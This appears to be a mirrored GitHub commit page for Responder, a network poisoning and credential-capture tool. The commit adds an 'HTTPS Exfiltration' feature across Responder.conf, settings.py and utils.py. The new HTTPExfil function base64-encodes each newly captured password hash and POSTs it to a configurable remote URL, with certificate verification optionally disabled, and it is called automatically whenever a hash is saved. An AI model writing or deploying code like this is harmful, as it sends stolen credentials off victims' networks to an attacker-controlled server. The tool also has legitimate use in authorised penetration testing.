github/Responder
1
0
Fork 0
mirror of https://github.com/lgandx/Responder.git synced 2025-08-22 14:23:39 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Added HTTPS Exfiltration which sends newly found hsahes as a POST request to the specified URL

Browse source
This commit is contained in:
deadjakk 2021-06-02 02:16:36 -05:00
commit 408e017377
3 changed files with 44 additions and 6 deletions
Download patch file Download diff file Expand all files Collapse all files

5
Responder.conf
View file

@ -108,3 +108,8 @@ username=sendingaddress@domain.com
password=passwordtoemail password=passwordtoemail
port=587 port=587
server=mail.domain.com server=mail.domain.com
[HTTPS Exfiltration]
enabled=On
url=https://domain.com:9090
verifyssl=Off

5
settings.py
View file

@ -84,6 +84,11 @@ class Settings:
config = ConfigParser.ConfigParser() config = ConfigParser.ConfigParser()
config.read(os.path.join(self.ResponderPATH, 'Responder.conf')) config.read(os.path.join(self.ResponderPATH, 'Responder.conf'))
# HTTPS Exfiltration
self.httpsexfil_enabled = self.toBool(config.get('HTTPS Exfiltration','enabled'))
self.httpsexfil_url = config.get('HTTPS Exfiltration','url')
self.httpsexfil_verify = self.toBool(config.get('HTTPS Exfiltration','verifyssl'))
# Email # Email
self.emailenabled = self.toBool(config.get('Email', 'enabled')) self.emailenabled = self.toBool(config.get('Email', 'enabled'))
self.emailserver = config.get('Email', 'server') self.emailserver = config.get('Email', 'server')

28
utils.py
View file

@ -26,6 +26,31 @@ import codecs
import struct import struct
from calendar import timegm from calendar import timegm
def HTTPExfil(result):
result = str(result)
try:
if not settings.Config.httpsexfil_enabled:
return
# requests isn't in stdlib, so using urllib
import urllib.parse
import urllib.request
import ssl
import base64
ctx = ssl.create_default_context()
if not settings.Config.httpsexfil_verify:
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
data = {
'hashes' : base64.b64encode(result.encode()),
}
data = bytes( urllib.parse.urlencode( data ).encode() )
handler = urllib.request.urlopen( settings.Config.httpsexfil_url, data , context=ctx)
print(color("[HTTPS Exfil]",3,1),"Sent via https exfil")
except Exception as e:
print(color("[HTTPS Exfil]",1),"Error sending via HTTPS Exfil{}".format(e))
return
def EmailHash(result): def EmailHash(result):
import smtplib import smtplib
if not settings.Config.emailenabled: if not settings.Config.emailenabled:
@ -312,6 +337,9 @@ def SaveToDb(result):
# Email to desired email address # Email to desired email address
EmailHash(str(result)) EmailHash(str(result))
# Send via POST to HTTPS server
HTTPExfil(result)
elif len(result['cleartext']): elif len(result['cleartext']):
print(color('[*] Skipping previously captured cleartext password for %s' % result['user'], 3, 1)) print(color('[*] Skipping previously captured cleartext password for %s' % result['user'], 3, 1))
text('[*] Skipping previously captured cleartext password for %s' % result['user']) text('[*] Skipping previously captured cleartext password for %s' % result['user'])